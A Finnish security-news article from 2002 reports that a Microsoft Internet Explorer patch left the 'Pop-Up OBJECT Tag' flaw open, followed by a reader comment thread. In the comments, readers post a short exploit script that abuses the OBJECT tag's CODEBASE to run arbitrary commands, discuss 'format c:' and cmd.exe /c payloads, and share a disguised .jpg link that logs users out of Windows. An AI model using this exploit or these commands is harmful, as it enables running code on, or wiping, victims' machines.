Kirjaudu

Uutiskirje

Rekisteröidy Sektoriin ja tilaa itsellesi joko aamuisin tai iltaisin ilmestyvä uutiskirje sähköpostiisi.

Torstai, 14.2.2002

IE:n korjauspaketti ei tilkitsekään kaikkia luvattuja reikiä

Microsoftin maanantaina julkaisema Internet Explorerin korjauspäivitys ei tilkitsekään kaikkia luvattuja tietoturva-aukkoja. Korjauspaketin luvattiin paikkaavaan kuusi aiemmin paljastettua IE:n tietoturvareikää, mutta Newsbytes-uutispalvelun ja riippumattomien tutkijoiden testien mukaan päivitys korjaa kaksi reikää vain osittain ja jättää yhden aukon täysin avoimeksi.

Kokonaan avoimeksi jäävä reiän, joka tunnetaan nimellä "IE Pop-Up OBJECT Tag Bug," paljasti Microsoftille nimimerkkiä ThePull-käyttävä tietoturva-asiantuntija 10.1.2002. ThePullin nettisivulla oleva demo pystyy yhä käynnistämään IE6-selaimen kautta käyttäjän koneella olevia ohjelmia huolimatta maanantaina julkaistusta korjauspaketista, mikäli käyttöjärjestelmänä on joko Windows 2000 tai 98.

Lue juttu K2, 14.2.2002 00:18. Lähde: SecurityFocus

Muita aiheeseen liittyviä uutisia

Rekisteröidy ja kirjaudu sisään, jos haluat kommentoida.

Kommentit ( 19 uutta / 19 )
pistettä.
Näytä vain kommentit joilla on vähintään
no voi !¤/"#(¤"#!
Anonyymi kommentoija, 14.2.2002 08:44:37		 Pisteet: 0
...Nyt alkaa kyllä käämi kärytä jo ja pahasti.
Ei tässä touhussa ole todellakaan mitään järkeä.
Uutta windowsia tehdään jatkuvasti, eikä edellisiäkään saada kuntoon. Bugi/aukkokierre jatkuu jatkumistaan.

On se nyt kumma etteivät sitten ole voineet ilmoittaa rehellisesti, että yksi reikä on vielä paikkaamatta, mutta homma on työn alla. Jokainen tapaus jossa M$ todetaan valehtelevaksi osapuoleksi, aiheuttaa yritykselle huomattavasti hallaa. -Okei, se on iso yritys ja sillä on melkoinen markkinavalta, mutta ei sekään tällaisella pelillä voi ikuisesti jatkua.

Hyi hyi, M$!
bungle Re: no voi !¤/
bungle, 14.2.2002 13:04:10		 Pisteet: 0
...Nyt alkaa kyllä käämi kärytä jo ja pahasti.
Kyllähän se kieltämättä vituttaa ku tällasella linkikkä tai koodi pätkällä HTML:n seassa voidaan tuhuta vaikka koko koko levyn sisältö:

<script>

var x = window.open();
x.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="{ tähän komento, joka halutaan ajaa }">';

</script>
--
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
Logica Re: no voi !¤/
Logica, 14.2.2002 13:16:21		 Pisteet: 0
Kyllähän se kieltämättä vituttaa ku tällasella linkikkä tai koodi pätkällä HTML:n seassa voidaan tuhuta vaikka koko koko levyn sisältö: <script>
var x = window.open();
x.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="{ tähän komento, joka halutaan ajaa }">';
</script>

Eikai toi voi toimia niin simppelisti että CODEBASE="{ command format c: }" ?

Jestas...
bungle Re: no voi !¤/
bungle, 14.2.2002 13:46:57		 Pisteet: 0
Eikai toi voi toimia niin simppelisti että CODEBASE="{ command format c: }" ? Jestas...
Siis noi {} sulkeet pois, niin toimii.
--
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
Re: no voi !¤/
Anonyymi kommentoija, 14.2.2002 17:18:22		 Pisteet: 0
Eikai toi voi toimia niin simppelisti että CODEBASE="{ command format c: }" ? Jestas...
Siis noi {} sulkeet pois, niin toimii.
No ei ainakaan IE6:ssa toiminut 'format a:' oli {}-merkit tai ei. Eikä kyllä pari muuta komentookaan mitään antanut. Sanoppa joku ei niin haitallinen jolla voisin testaa komentoa...
Re: no voi !¤/
karipk, 14.2.2002 17:54:30		 Pisteet: 0
No ei ainakaan IE6:ssa toiminut 'format a:' oli {}-merkit tai ei. Eikä kyllä pari muuta komentookaan mitään antanut. Sanoppa joku ei niin haitallinen jolla voisin testaa komentoa...
Kokeile vaikka:
c:/winnt/system32/cmd.exe
Re: no voi !¤/
Anonyymi kommentoija, 14.2.2002 18:38:36		 Pisteet: 0
No ei ainakaan IE6:ssa toiminut 'format a:' oli {}-merkit tai ei. Eikä kyllä pari muuta komentookaan mitään antanut. Sanoppa joku ei niin haitallinen jolla voisin testaa komentoa...
Kokeile vaikka:
c:/winnt/system32/cmd.exe
avaa vaan uuden ikkunan? Ei ainakaan mikään käynnistynyt...
Re: no voi !¤/
Anonyymi kommentoija, 15.2.2002 00:12:10		 Pisteet: 0
c:/winnt/system32/cmd.exe avaa vaan uuden ikkunan? Ei ainakaan mikään käynnistynyt...
Jos tain syystä itsellänikäöän ei aina käynnisty, mutta useimmissa tapauksissa käynnistyy. Tuolla sivullahan on erilaisia ohjelmia, mitä pystyy käynnistelemään, en tosin ole varma, että pitääkö käynnistettävän ohjelman olla activex exe vai mikä, mutta jos ajatellaan, että käyttäjän koneelle saa turvallisuusreikää x hyväksikäyttäen sujautettua ohjelman y ja tätä aukkoa käyttämällä ajamaan tuon, niin kyllä toi helvetin paha aukko on ja kikkailemalla kyllä saadaan jo pelkillä windows ohjelmilla (siis niillä mitä siellä valmiiksi on) paljonkin haittaa aikaiseksi.
Re: no voi !¤/
Anonyymi kommentoija, 14.2.2002 23:20:27		 Pisteet: 0
Kokeile vaikka: c:/winnt/system32/cmd.exe
... ja jos haluat mukaan myös testikomennon, muttet formatoida levyä, olisiko tämä riittävän harmiton:

cmd /c dir c:\ && pause
Logica Re: no voi !¤/
Logica, 14.2.2002 18:26:18		 Pisteet: 0
No ei ainakaan IE6:ssa toiminut 'format a:' oli {}-merkit tai ei. Eikä kyllä pari muuta komentookaan mitään antanut. Sanoppa joku ei niin haitallinen jolla voisin testaa komentoa...
Kokeile vaikka:
c:/winnt/system32/cmd.exe
Mutta voiko sitten tuon perässä enää ajaa jotain itse komentoa, tuo avaa vain ohjelman..?
iguana Re: no voi !¤/
iguana, 15.2.2002 17:55:27		 Pisteet: 0
No ei ainakaan IE6:ssa toiminut 'format a:' oli {}-merkit tai ei. Eikä kyllä pari muuta komentookaan mitään antanut. Sanoppa joku ei niin haitallinen jolla voisin testaa komentoa...
Kokeile vaikka:
c:/winnt/system32/cmd.exe
Mutta voiko sitten tuon perässä enää ajaa jotain itse komentoa, tuo avaa vain ohjelman..?
Voi. Esim. c:/winnt/system32/cmd.exe /c komentojonkahaluatajaa.exe
Pisterajan alittavia kommentteja piilossa.
bungle Re: taas bugas pahasti sektorin kommentointi
bungle, 14.2.2002 00:29:27		 Pisteet: +1
demo pystyy yhä käynnistämään IE6-selaimen kautta käyttäjän koneella olevia ohjelmia
Pitihän tuota oikein itsekin kokeilla. Paha bugi ei voi muuta sanoa. Eikös B.Gates lähettänyt tässä taannoin sähköpostin työntekijöilleen, jossa sanottiin, että uusien ominaisuuksien ja ohjelmien kehittäminen tulisi jäädyttää. Jos edes osa MS:n työn tekijöistä on tuota noudattanut, niin tuntuu uskomattomalta, että tätä ei saada korjattua muutoin kuin näin:

Workaround Suggestions: Disable ActiveScripting, use Netscape on untrusted sites, browse trusted sites only, do not allow ActiveScripting to be parsed in emails or newsposts
--
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
Logica Re: taas bugas pahasti sektorin kommentointi
Logica, 14.2.2002 09:09:28		 Pisteet: +1
Workaround Suggestions: Disable ActiveScripting, use Netscape on untrusted sites, browse trusted sites only, do not allow ActiveScripting to be parsed in emails or newsposts

Kun tuolta löi päälle disable activescriptingin tai paremminkin pistin että "prompt" niin eikös jokaiselle saitille mentäessä ie mankunut että "scripts are usually safe, do you want scripts to run?" Poisti tosin ongelman kun poisti scriptit mutta....
heko Re: taas bugas pahasti sektorin kommentointi
heko, 14.2.2002 13:01:58		 Pisteet: 0
"scripts are usually safe, do you want scripts to run?"
Muutamankin kerran viestin lukeneena: on kyllä outoa huumoria, ei voi muuta sanoa.

"Scripts may have security implications, but some pages will not display correctly if you disable scripts. Do you trust the scripts on this site?"

Sisällöltään tämä olisi jo vähän kattavampi, vaikkei ehkä muotoilultaan.
--
Heikki http://www.heikkikorpela.fi heikki@heikkikorpela.fi
bungle Re: taas bugas pahasti sektorin kommentointi
bungle, 14.2.2002 13:08:19		 Pisteet: 0
"Scripts may have security implications, but some pages will not display correctly if you disable scripts. Do you trust the scripts on this site?" Sisällöltään tämä olisi jo vähän kattavampi, vaikkei ehkä muotoilultaan.
Paremminkin näin:

"HTML embedded scripts are allways safe, but because you are using Internet Explorer nothing can be said for sure on this matter."
--
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
iguana No huhhuh
iguana, 14.2.2002 17:51:22		 Pisteet: 0
Vielä 5.50:kin, ei tosin ehkä uusimmat päívitykset mukana, näyttää olevan "rikki".

Ainakin ton kaverin testit tuntuu toimivan paremmin kuin hyvin:
http://www.osioniusx.com/
juu.. hyvin on korjattu taas..
Zemial, 20.2.2002 15:32:39		 Pisteet: 0
http://selfdestruct.net/ie6.jpg

Linkki näyttää harmittomalta linkiltä kuvaan, mutta kirjautuu kivasti ulos winkkarista.. jee..
Re: juu.. hyvin on korjattu taas..
Zemial, 20.2.2002 15:43:45		 Pisteet: 0
http://selfdestruct.net/ie6.jpg Linkki näyttää harmittomalta linkiltä kuvaan, mutta kirjautuu kivasti ulos winkkarista.. jee..
ja tuohon yhdistää muutamien avaimien kirjoitteluja rekisteriin : http://www.planetsourcecode.com/vb/scripts/ShowCod...

ja kyllä lähtee..